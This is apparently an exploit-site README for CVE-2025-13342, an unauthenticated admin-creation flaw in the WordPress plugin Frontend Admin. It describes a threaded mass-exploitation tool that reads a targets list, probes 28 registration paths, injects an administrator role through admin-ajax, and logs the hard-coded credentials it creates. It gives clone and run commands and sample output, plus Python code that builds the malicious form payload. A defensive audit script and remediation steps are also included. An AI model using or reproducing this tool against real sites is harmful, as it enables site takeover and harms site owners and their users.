## https://sploitus.com/exploit?id=7EE94DED-A8FB-51C4-B5FF-B5B8B01EAED9
# CVE-2025-13342
Frontend Admin by DynamiApps <= 3.28.20 - Unauthenticated Arbitrary Options Update
# ⚡ CVE-2025-13342
## Frontend Admin by DynamiApps: Unauthenticated Admin Creation

```
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__
```

[![CVE](https://img.shields.io/badge/CVE-2025--13342-critical?style=flat-square&color=CC0000)](https://vulners.com/cve/CVE-2025-13342)
[![CVSS](https://img.shields.io/badge/CVSS%203.1-9.8%20CRITICAL-red?style=flat-square)](https://nvd.nist.gov/)
[![Plugin](https://img.shields.io/badge/Frontend%20Admin%20%E2%89%A4%203.28.20-blueviolet?style=flat-square)](https://wordpress.org/plugins/frontend-admin/)
[![Auth](https://img.shields.io/badge/Auth-None%20Required-brightgreen?style=flat-square)]()
[![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python&logoColor=white)]()

---

## ◈ Vulnerability

| Field | Detail |
|---|---|
| **CVE ID** | CVE-2025-13342 |
| **Score** | **9.8 CRITICAL** (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`) |
| **CNA** | Wordfence |
| **Affected** | Frontend Admin by DynamiApps ≤ **3.28.20** |
| **Auth** | **None** (fully unauthenticated) |
| **Type** | Insufficient Capability Check + Input Validation → Arbitrary Option Write |
| **CWE** | CWE-284 · Improper Access Control |

**What happens:**  
The `ActionOptions::run()` save handler neither checks the submitting user's capabilities nor validates the option names and values it receives before writing them to `wp_options`, so any publicly reachable Frontend Admin (ACF-based) form whose save action goes through that handler is an unauthenticated write channel into site configuration. The attacker sets `users_can_register=1` and `default_role=administrator`, then registers an ordinary account through the site's normal registration flow; the new account receives the Administrator role automatically because that is now the default.

**This tool skips that two-step approach.** It submits the crafted form payload directly, with `role=administrator` injected into the user-creation fields via `acff[user][field_*]`, creating an admin account in a single AJAX call. A `{"success":true}` reply only shows that the form handler accepted the submission; confirm the role by logging in with the created account before treating the host as compromised.
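Added defender-side example (written for this page, not part of the repository): an audit that checks the two options named above and looks for the account the tool creates. The `PRIVILEGED_ROLES` set, the 30-day lookback and the sample option/user records are assumptions constructed for the example; the username and e-mail indicators are the fixed credentials listed under Usage below.

```python
"""Audit a WordPress site for the state this CVE is used to reach.

Added example for this README (not code from the Nxploited repository). It checks
the two options the advisory names (`users_can_register`, `default_role`), flags
Administrator accounts created inside a lookback window, and matches the tool's
hard-coded username/email from the Usage section as indicators. The option
snapshot and user records below are constructed for the example.
"""
from datetime import datetime, timedelta

# Indicators copied from the "Credentials are fixed internally" table in this README.
TOOL_USERNAME = "Nxadmin1"
TOOL_EMAIL = "nxploitedtest@gmail.com"
# Assumption: roles that open self-registration must never hand out.
PRIVILEGED_ROLES = {"administrator", "editor"}
# Reference time for the constructed sample below.
NOW = datetime(2025, 6, 2)

# Constructed snapshot, shaped like `wp option get` / `wp user list --format=json` output.
SAMPLE_OPTIONS = {"users_can_register": "1", "default_role": "administrator"}
SAMPLE_USERS = [
    {"user_login": "siteowner", "user_email": "owner@example.test",
     "roles": "administrator", "user_registered": "2023-02-11 09:12:00"},
    {"user_login": "Nxadmin1", "user_email": "nxploitedtest@gmail.com",
     "roles": "administrator", "user_registered": "2025-06-01 14:30:22"},
    {"user_login": "reader", "user_email": "reader@example.test",
     "roles": "subscriber", "user_registered": "2025-05-28 18:00:00"},
]


def _roles(user):
    """wp-cli emits roles as a comma-separated string; tolerate a list too."""
    r = user.get("roles", "")
    if isinstance(r, (list, tuple, set)):
        return set(r)
    return {x.strip() for x in r.split(",") if x.strip()}


def audit(options, users, now, lookback_days=30):
    """Return a list of findings, each {"kind", "severity", "detail"}; [] means clean."""
    findings = []
    default_role = str(options.get("default_role", "")).lower()
    open_signup = str(options.get("users_can_register", "0")) == "1"
    if default_role in PRIVILEGED_ROLES:
        # Privileged default role is bad on its own; with open signup it is the
        # exact post-exploitation state described for this CVE.
        findings.append({
            "kind": "privileged_default_role",
            "severity": "CRITICAL" if open_signup else "HIGH",
            "detail": f"default_role={default_role}, users_can_register={int(open_signup)}",
        })
    cutoff = now - timedelta(days=lookback_days)
    for u in users:
        login = u.get("user_login", "")
        email = u.get("user_email", "").lower()
        registered = datetime.strptime(u["user_registered"], "%Y-%m-%d %H:%M:%S")
        if login == TOOL_USERNAME or email == TOOL_EMAIL:
            findings.append({"kind": "tool_ioc", "severity": "CRITICAL",
                             "detail": f"account {login} <{email}> matches the tool's fixed credentials"})
        if "administrator" in _roles(u) and registered >= cutoff:
            findings.append({"kind": "recent_admin", "severity": "HIGH",
                             "detail": f"administrator {login} registered {u['user_registered']}"})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_OPTIONS, SAMPLE_USERS, now=NOW):
        print(f"[{f['severity']}] {f['kind']}: {f['detail']}")
```

Real inputs come from `wp option get users_can_register`, `wp option get default_role` and `wp user list --fields=user_login,user_email,user_registered,roles --format=json`. If the audit fires, reset the options (`wp option update users_can_register 0`, `wp option update default_role subscriber`), remove the rogue account, and update the plugin to 3.28.21 or later, since leaving the vulnerable handler in place lets the attacker rewrite the options again.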

---

## ◈ How the Exploit Works

```
1. Crawl common registration paths  →  locate ACF frontend form
2. Parse hidden fields               →  _acf_nonce, _acf_form
3. Map user fields                   →  username · email · password · role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][field_*] = administrator   (the mapped role field)
5. {"success":true}  →  admin account created
6. Log to acf_success.txt
```
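Steps 2 to 4 as an added Python example: this is illustrative code written for this page, not the repository's script. It relies only on the names the README gives (`_acf_nonce`, `_acf_form`, `action=frontend_admin/form_submit`, the `acff[user][...]` prefix); the sample HTML and its `field_u*` keys are constructed, and the username/role heuristics are an assumption about how such forms are labelled. It uses only the standard library so it runs offline; the crawl over the 28 paths and the final `requests.post(f"{base}/wp-admin/admin-ajax.php", data=payload)` call are left out.

```python
"""Locate the hidden ACF fields on a fetched page and build the admin-ajax POST body.

Added example for this README (not code from the Nxploited repository). It uses only
names the README gives: the hidden inputs `_acf_nonce` and `_acf_form`, the AJAX
action `frontend_admin/form_submit` and the `acff[user][...]` field prefix. The
HTML below is constructed for the example; its `field_u*` keys are invented.
"""
from html.parser import HTMLParser
from urllib.parse import urlencode

AJAX_ACTION = "frontend_admin/form_submit"
USER_PREFIX = "acff[user]["
REQUIRED_HIDDEN = ("_acf_nonce", "_acf_form")

# Constructed registration form, not fetched from any site.
SAMPLE_HTML = """
<form class="acf-form" method="post">
  <input type="hidden" name="_acf_nonce" value="a1b2c3d4e5">
  <input type="hidden" name="_acf_form" value="123">
  <input type="text" id="acf-field_u1" name="acff[user][field_u1]" placeholder="Username">
  <input type="email" name="acff[user][field_u2]" placeholder="Email">
  <input type="password" name="acff[user][field_u3]" placeholder="Password">
  <select name="acff[user][field_u4]">
    <option value="subscriber" selected>Subscriber</option>
  </select>
  <input type="submit" value="Register">
</form>
"""


class _FormParser(HTMLParser):
    """Collect every named <input>/<select> with its type, value and naming hints."""

    def __init__(self):
        super().__init__()
        self.fields = []
        self._select = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("name"):
            hint = " ".join(a.get(k, "") for k in ("id", "placeholder", "class")).lower()
            self.fields.append({"name": a["name"], "type": a.get("type", "text").lower(),
                                "value": a.get("value", ""), "hint": hint})
        elif tag == "select" and a.get("name"):
            self._select = {"name": a["name"], "type": "select", "value": "",
                            "hint": a.get("id", "").lower()}
            self.fields.append(self._select)
        elif tag == "option" and self._select is not None and "selected" in a:
            self._select["value"] = a.get("value", "")   # remember the default choice

    def handle_endtag(self, tag):
        if tag == "select":
            self._select = None


def parse_form(html):
    parser = _FormParser()
    parser.feed(html)
    return parser.fields


def classify_user_fields(fields):
    """Map the acff[user][...] inputs to username/email/password/role.

    Type attributes are authoritative; id/placeholder text is the fallback
    (an assumption about how these forms are labelled). Returns {logical: input name}.
    """
    mapping = {}
    for f in fields:
        if not f["name"].startswith(USER_PREFIX):
            continue
        if f["type"] == "email":
            key = "email"
        elif f["type"] == "password":
            key = "password"
        elif f["type"] == "select" or "role" in f["hint"]:
            key = "role"
        elif any(w in f["hint"] for w in ("user", "login")):
            key = "username"
        else:
            continue
        mapping.setdefault(key, f["name"])
    return mapping


def build_payload(html, username, email, password, role="administrator"):
    """Return the form parameters for POST /wp-admin/admin-ajax.php (step 4)."""
    fields = parse_form(html)
    hidden = {f["name"]: f["value"] for f in fields if f["type"] == "hidden"}
    if any(h not in hidden for h in REQUIRED_HIDDEN):
        raise ValueError("not a Frontend Admin form: missing " + "/".join(REQUIRED_HIDDEN))
    user = classify_user_fields(fields)
    missing = {"username", "email", "password", "role"} - set(user)
    if missing:
        raise ValueError("could not map user fields: " + ", ".join(sorted(missing)))
    # The role value is forced to `administrator` whether or not the form offers it.
    return {"action": AJAX_ACTION, **hidden,
            user["username"]: username, user["email"]: email,
            user["password"]: password, user["role"]: role}


def encode_body(payload):
    """application/x-www-form-urlencoded body, as requests.post(data=...) would send it."""
    return urlencode(payload)
```

The role value is written into the mapped field regardless of what the form's select offers, which is the injection the README describes; the server-side handler, not the HTML, decides whether it is honoured, which is why a `{"success":true}` reply still needs a login check.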

---

## ◈ Requirements

```
requests
beautifulsoup4
colorama
rich
```

```bash
pip install requests beautifulsoup4 colorama rich
```

---

## ◈ Installation & Run

```bash
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py
```

---

## ◈ Usage

The tool is interactive. You will be asked four questions:

```
Targets file path    →  list.txt
Threads              →  10
Timeout (seconds)    →  10
Verbose debug        →  y / N
```

**Credentials are fixed internally:**

| Field | Value |
|---|---|
| Username | `Nxadmin1` |
| Email | `nxploitedtest@gmail.com` |
| Password | `NxAdmin_1337#KSA` |

---

## ◈ Targets File

One host per line; the scheme is optional:

```
https://target1.com
target2.com
http://target3.com
```

---

## ◈ Scanned Registration Paths

The tool probes **28 paths** per target in order, stopping at the first valid ACF form:

```
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...
```

---

## ◈ Output

| File | Contents |
|---|---|
| `acf_success.txt` | Confirmed successful admin creations |

**Format:**
```
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 EMAIL=nxploitedtest@gmail.com PASS=NxAdmin_1337#KSA JSON={"success":true,...}
```

**Terminal:**
```
[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com
```

---

## ◈ Contact

| | |
|---|---|
| **Author** | Nxploited (Khaled Alenazi) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |

---

## ◈ Disclaimer

> This tool is provided **for authorized security research and educational purposes only**.  
> The author accepts **no responsibility** for any use against systems without explicit written permission from the owner.  
> Unauthorized access is illegal under the CFAA, CMA, and equivalent laws worldwide.  
> **You are solely responsible for your actions.**

---


© 2025 Nxploited · Frontend Admin by DynamiApps ≤ 3.28.20 · Fixed in 3.28.21